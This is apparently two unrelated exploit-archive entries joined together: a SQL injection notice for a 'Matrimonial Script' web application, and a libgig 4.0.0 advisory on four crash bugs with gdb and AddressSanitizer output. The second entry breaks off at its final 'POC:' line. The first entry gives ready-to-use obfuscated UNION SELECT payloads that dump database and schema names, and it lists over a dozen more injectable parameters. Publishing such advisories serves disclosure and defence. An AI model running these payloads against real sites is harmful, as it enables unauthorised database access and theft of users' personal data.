
# # # # # 
# Exploit Title: Matrimonial Script - SQL Injection
# Dork: N/A
# Date: 22.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Demo: http://www.mscript.in/matrimonial-demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/viewprofile.php?id=[SQL]
#
# -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2
831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+-
#
# http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL]
#
# -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+-
#
# http://localhost/[PATH]/printprofile.php?id=[SQL]
# http://localhost/[PATH]/viewphoto.php?id=[SQL]
# http://localhost/[PATH]/advsearch_results.php?gender=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age1=[SQL]
# http://localhost/[PATH]/advsearch_results.php?age2=[SQL]
# http://localhost/[PATH]/advsearch_results.php?religion=[SQL]
# http://localhost/[PATH]/advsearch_results.php?caste=[SQL]
# http://localhost/[PATH]/advsearch_results.php?ms=[SQL]
# http://localhost/[PATH]/advsearch_results.php?language=[SQL]
# http://localhost/[PATH]/advsearch_results.php?edu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?occu=[SQL]
# http://localhost/[PATH]/advsearch_results.php?country=[SQL]
#
# Etc..
# # # # #
            
================
Author : qflb.wu
================


Introduction:
=============
https://www.linuxsampler.org/libgig/
libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data. 


Affected version:
=================
4.0.0


Vulnerability Description:
==========================
1.
The gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service (NULL pointer dereference and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_null_pointer_dereference_1.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
2970                    if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
(gdb) bt
#0  0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0, 
    pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
#1  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80, 
    pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
    at gig.cpp:4404
#2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
   0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je     0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
   0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor    %edx,%edx
   0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov    %eax,%esi
   0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov    %rbx,%rdi
   0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov    0x138(%r13),%r14
   0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq  0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
=> 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov    %rax,0x38(%r14)
   0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add    $0x1,%ebp
   0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add    $0x8,%r13
   0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp    %ebp,0x130(%rbx)
End of assembler dump.
(gdb) i r
rax            0x60ca90            6343312
rbx            0x614ce0            6376672
rcx            0x3                 3
rdx            0x60a300            6333184
rsi            0x0                 0
rdi            0x609160            6328672
rbp            0x0                 0x0
rsp            0x7fffffffdcc0      0x7fffffffdcc0
r8             0x0                 0
r9             0x2                 2
r10            0x0                 0
r11            0x246               582
r12            0x615950            6379856
r13            0x614ce0            6376672
r14            0x0                 0
r15            0x0                 0
rip            0x7ffff7bc07df      0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
eflags         0x10246             [ PF ZF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) 


ASAN:SIGSEGV
=================================================================
==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
    #1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
==40516== ABORTING


POC:
libgig_4.0.0_null_pointer_dereference_1.gig
CVE:
CVE-2017-12950


2.
The gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service (stack buffer overflow and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_stack_buffer_overflow.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
2884        table[0] = 0;
(gdb) bt
#0  0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2884
#1  0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
    this=<optimized out>, curveType=<optimized out>, depth=<optimized out>, 
    scaling=<optimized out>) at gig.cpp:2054
#2  0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
    this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>, 
    vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>, 
    vcfCutoffController=<optimized out>) at gig.cpp:2042
#3  0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
    this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
    at gig.cpp:1617
#4  0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
    this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
#5  0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0, 
    pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
#6  0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280, 
    pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
    at gig.cpp:4404
#7  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#8  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#9  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
...
   0x00007ffff7bb8b27 <+2119>:mov    0x2e0(%rsp,%rdx,8),%rsi
   0x00007ffff7bb8b2f <+2127>:je     0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
   0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
   0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
   0x00007ffff7bb8b3d <+2141>:movq   $0x0,(%rax)
=> 0x00007ffff7bb8b44 <+2148>:mov    0x8(%rsi),%edi
   0x00007ffff7bb8b47 <+2151>:lea    0x8(%rax),%rcx
   0x00007ffff7bb8b4b <+2155>:mov    0xc(%rsi),%r10d
   0x00007ffff7bb8b4f <+2159>:mov    $0x1,%edx
...
(gdb) i r
rax            0x60e050            6348880
rbx            0x14                20
rcx            0x7ffff7669760      140737344083808
rdx            0xfe                254
rsi            0x2f736c6f6f742f63  3419195767971393379
rdi            0x2                 2
rbp            0x0                 0x0
rsp            0x7fffffffd860      0x7fffffffd860
r8             0x60dbc0            6347712
r9             0x40                64
r10            0x7fffffffd9f0      140737488345584
r11            0x7ffff7bbf601      140737349678593
r12            0x4                 4
r13            0x60d770            6346608
r14            0x60c3a0            6341536
r15            0x60c3a0            6341536
rip            0x7ffff7bb8b44      0x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
eflags         0x10246             [ PF ZF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/20x $rsi+0x8
0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
(gdb) 
0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
(gdb)


==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
READ of size 8 at 0x7ffc9ca05fa0 thread T0
    #0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
    #1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
    #2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
    #3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
    #4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
    #5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
    #6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
  This frame has 2 object(s):
    [32, 40) 'name'
    [96, 104) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
Shadow bytes around the buggy address:
  0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
=>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
  0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
  0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==40504== ABORTING


POC:
libgig_4.0.0_stack_buffer_overflow.gig
CVE:
CVE-2017-12951


3.
The LoadString function in helper.h in libgig 4.0.0 can cause a denial of service (NULL pointer dereference and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_null_pointer_dereference_2.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
LoadString (s="", ck=0x6095d0) at helper.h:148
148            if (str[len] == '\0') break;
(gdb) bt
#0  LoadString (s="", ck=0x6095d0) at helper.h:148
#1  DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865, 
    lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
#2  0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
    at DLS.cpp:263
#3  0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160, 
    Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
    at DLS.cpp:448
#4  0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
    at DLS.cpp:1435
#5  0x00007ffff7bbab2e in gig::File::File (this=0x609160, 
    pRIFF=<optimized out>) at gig.cpp:5201
#6  0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:70
(gdb) disassemble 
Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
   0x00007ffff7ba7f30 <+0>:push   %rbp
   0x00007ffff7ba7f31 <+1>:mov    %edi,%eax
   0x00007ffff7ba7f33 <+3>:mov    %rsi,%rdi
   0x00007ffff7ba7f36 <+6>:mov    %eax,%esi
   0x00007ffff7ba7f38 <+8>:push   %rbx
   0x00007ffff7ba7f39 <+9>:mov    %rdx,%rbx
   0x00007ffff7ba7f3c <+12>:sub    $0x8,%rsp
   0x00007ffff7ba7f40 <+16>:callq  0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
   0x00007ffff7ba7f45 <+21>:test   %rax,%rax
   0x00007ffff7ba7f48 <+24>:mov    %rax,%rbp
   0x00007ffff7ba7f4b <+27>:je     0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
   0x00007ffff7ba7f4d <+29>:mov    %rax,%rdi
   0x00007ffff7ba7f50 <+32>:callq  0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
   0x00007ffff7ba7f55 <+37>:mov    0xc(%rbp),%r10d
   0x00007ffff7ba7f59 <+41>:mov    %rax,%rsi
   0x00007ffff7ba7f5c <+44>:test   %r10d,%r10d
   0x00007ffff7ba7f5f <+47>:jle    0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
=> 0x00007ffff7ba7f61 <+49>:cmpb   $0x0,(%rax)
   0x00007ffff7ba7f64 <+52>:je     0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
   0x00007ffff7ba7f66 <+54>:mov    $0x1,%r9d
   0x00007ffff7ba7f6c <+60>:xor    %ecx,%ecx
   0x00007ffff7ba7f6e <+62>:jmp    0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
   0x00007ffff7ba7f70 <+64>:cmpb   $0x0,(%rsi,%r9,1)
   0x00007ffff7ba7f75 <+69>:lea    0x1(%r9),%r8
   0x00007ffff7ba7f79 <+73>:je     0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
   0x00007ffff7ba7f7b <+75>:mov    %r8,%r9
   0x00007ffff7ba7f7e <+78>:add    $0x1,%ecx
   0x00007ffff7ba7f81 <+81>:cmp    %r10d,%ecx
   0x00007ffff7ba7f84 <+84>:jne    0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
   0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
   0x00007ffff7ba7f89 <+89>:mov    %rbx,%rdi
   0x00007ffff7ba7f8c <+92>:callq  0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
   0x00007ffff7ba7f91 <+97>:add    $0x8,%rsp
   0x00007ffff7ba7f95 <+101>:mov    %rbp,%rdi
   0x00007ffff7ba7f98 <+104>:pop    %rbx
   0x00007ffff7ba7f99 <+105>:pop    %rbp
(gdb) i r
rax            0x0                 0
rbx            0x609238            6328888
rcx            0x7ffff739f9f7      140737341159927
rdx            0x7ffff5d9f000      140737318088704
rsi            0x0                 0
rdi            0x7ffff5d9f000      140737318088704
rbp            0x6095d0            0x6095d0
rsp            0x7fffffffdd80      0x7fffffffdd80
r8             0xffffffff          4294967295
r9             0x0                 0
r10            0x100001a           16777242
r11            0x247               583
r12            0x609220            6328864
r13            0x7fffffffdfa0      140737488347040
r14            0x0                 0
r15            0x6091a0            6328736
rip            0x7ffff7ba7f61      0x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
eflags         0x10202             [ IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb)


ASAN:SIGSEGV
=================================================================
==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
AddressSanitizer can not provide additional info.
    #0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
    #1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
    #2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
    #3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
    #4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
    #5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
    #6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
    #7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
==41244== ABORTING


POC:
libgig_4.0.0_null_pointer_dereference_2.gig
CVE:
CVE-2017-12952


4.
The gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service (invalid memory write and application crash) via a crafted gig file.


./gigdump libgig_4.0.0_invalid_memory_write.gig


----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
4445                RegionKeyTable[iKey] = pRegion;
(gdb) bt
#0  gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
    at gig.cpp:4445
#1  0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0, 
    pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
    at gig.cpp:4409
#2  0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160, 
    pProgress=0x0) at gig.cpp:5576
#3  0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
    this=this@entry=0x609160) at gig.cpp:5378
#4  0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
    at gigdump.cpp:205
#5  0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
    at gigdump.cpp:79
(gdb) disassemble 
Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
   0x00007ffff7bba240 <+0>:xor    %eax,%eax
   0x00007ffff7bba242 <+2>:nopw   0x0(%rax,%rax,1)
   0x00007ffff7bba248 <+8>:movq   $0x0,0x80(%rdi,%rax,1)
   0x00007ffff7bba254 <+20>:add    $0x8,%rax
   0x00007ffff7bba258 <+24>:cmp    $0x400,%rax
   0x00007ffff7bba25e <+30>:jne    0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
   0x00007ffff7bba260 <+32>:mov    0x60(%rdi),%r9
   0x00007ffff7bba264 <+36>:mov    (%r9),%r8
   0x00007ffff7bba267 <+39>:cmp    %r9,%r8
   0x00007ffff7bba26a <+42>:je     0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
   0x00007ffff7bba26c <+44>:nopl   0x0(%rax)
   0x00007ffff7bba270 <+48>:mov    0x10(%r8),%rcx
   0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
   0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
   0x00007ffff7bba27c <+60>:cmp    %esi,%eax
   0x00007ffff7bba27e <+62>:jg     0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
   0x00007ffff7bba280 <+64>:add    $0x1,%esi
   0x00007ffff7bba283 <+67>:nopl   0x0(%rax,%rax,1)
   0x00007ffff7bba288 <+72>:movslq %eax,%rdx
   0x00007ffff7bba28b <+75>:add    $0x1,%eax
   0x00007ffff7bba28e <+78>:cmp    %esi,%eax
=> 0x00007ffff7bba290 <+80>:mov    %rcx,0x80(%rdi,%rdx,8)
   0x00007ffff7bba298 <+88>:jne    0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
   0x00007ffff7bba29a <+90>:mov    (%r8),%r8
   0x00007ffff7bba29d <+93>:cmp    %r8,%r9
   0x00007ffff7bba2a0 <+96>:jne    0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
   0x00007ffff7bba2a2 <+98>:repz retq 
   0x00007ffff7bba2a4 <+100>:repz retq 
End of assembler dump.
(gdb) i r
rax            0x3fbd              16317
rbx            0x60a1a0            6332832
rcx            0x60d580            6346112
rdx            0x3fbc              16316
rsi            0x4201              16897
rdi            0x60a1a0            6332832
rbp            0x7fffffffdd90      0x7fffffffdd90
rsp            0x7fffffffdd08      0x7fffffffdd08
r8             0x60e740            6350656
r9             0x60b0f0            6336752
r10            0x7fffffffdad0      140737488345808
r11            0x7ffff7bba240      140737349657152
r12            0x0                 0
r13            0x60a0c0            6332608
r14            0x60a980            6334848
r15            0x60d580            6346112
rip            0x7ffff7bba290      0x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
eflags         0x10283             [ CF SF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb)


ASAN:SIGSEGV
=================================================================
==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
    #1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
    #2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
    #3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
    #4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
    #5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
    #6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
==43045== ABORTING


POC:
